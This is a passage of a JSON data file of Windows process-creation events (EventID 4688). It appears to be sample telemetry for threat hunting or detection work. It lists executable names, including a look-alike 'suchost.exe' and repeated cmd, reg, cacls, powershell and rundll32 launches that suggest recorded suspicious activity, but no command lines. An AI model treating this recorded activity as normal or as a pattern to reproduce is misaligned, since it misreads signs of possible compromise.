",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e4\",\"0x3e4\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"NaN\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"Exe\":[\"svchost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"dllhost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"MonitoringHost.exe\",\"unlodctr.exe\",\"conhost.exe\",\"csc.exe\",\"conhost.exe\",\"cvtres.exe\",\"lodctr.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WerFault.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"cscript.exe\",\"conhost.exe\",\"cscript.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"MOFWriter.exe\",\"conhost.exe\",\"ASMHost.exe\",\"conhost.exe\",\"SecEdit.exe\",\"SecEdit.exe\",\"DscRun.exe\",\"conhost.exe\",\"Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"pmfexe.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"MOMPerfSnapshotHelper.exe\",\"MOMPerfSnapshotHelper.exe\",\"MOMPerfSnapshotHelper.exe\",\"WmiPrvSE.exe\",\"MOMPerfSnapshotHelper.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"InstallAgent.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"InstallAgent.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"WmiPrvSE.exe\",\"CollectGuestLogs.exe\",\"cmd.exe\",\"conhost.exe\",\"svchost.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"suchost.exe\",\"powershell.exe\",\"powershell.exe\",\"cmd.exe\",\"GoogleUpdate.exe\",\"SpeechModelDownload.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"AppHostRegistrationVerifier.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"DeviceCensus.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"CompatTelRunner.exe\",\"conhost.exe\",\"MpCmdRun.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wsqmcons.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"taskhostw.exe\",\"appidcertstorecheck.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"GoogleUpdate.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wsqmcons.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"reg.exe\",\"cacls.exe\",\"powershell.exe\",\"wermgr.exe\",\"cscript.exe\",\"cacls.exe\",\"cscript.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"rundll32.exe\",\"powershell.exe\",\"wermgr.exe\",\"svchost.exe\",\"netcfg.exe\",\"cscript.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"taskhostw.exe\",\"GoogleUpdate.exe\",\"UsoClient.exe\",\"conhost.exe\",\"GoogleUpdate.exe\",\"wermgr.exe\",\"wermgr.exe\",\"GoogleUpdate.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"cmd.exe\",\"cmd.exe\",\"cmd.exe\",\"PING.EXE\",\"reg.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"cacls.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"rundll32.exe\",\"PING.EXE\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"services.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"WmiApSrv.exe\",\"WmiApSrv.exe\",\"WmiApSrv.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"svchost.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"GoogleUpdate.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"sppsvc.exe\",\"MonitoringHost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"DscRun.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"cmd.exe\",\"conhost.exe\",\"cmd.exe\",\"powershell.exe\",\"PING.EXE\",\"svchost.exe\",\"PING.EXE\",\"netcfg.exe\",\"PING.EXE\",\"cscript.exe\",\"WaAppAgent.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"WaSecAgentProv.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"CollectGuestLogs.exe\",\"conhost.exe\",\"cmd.exe\",\"conhost.exe\",\"Col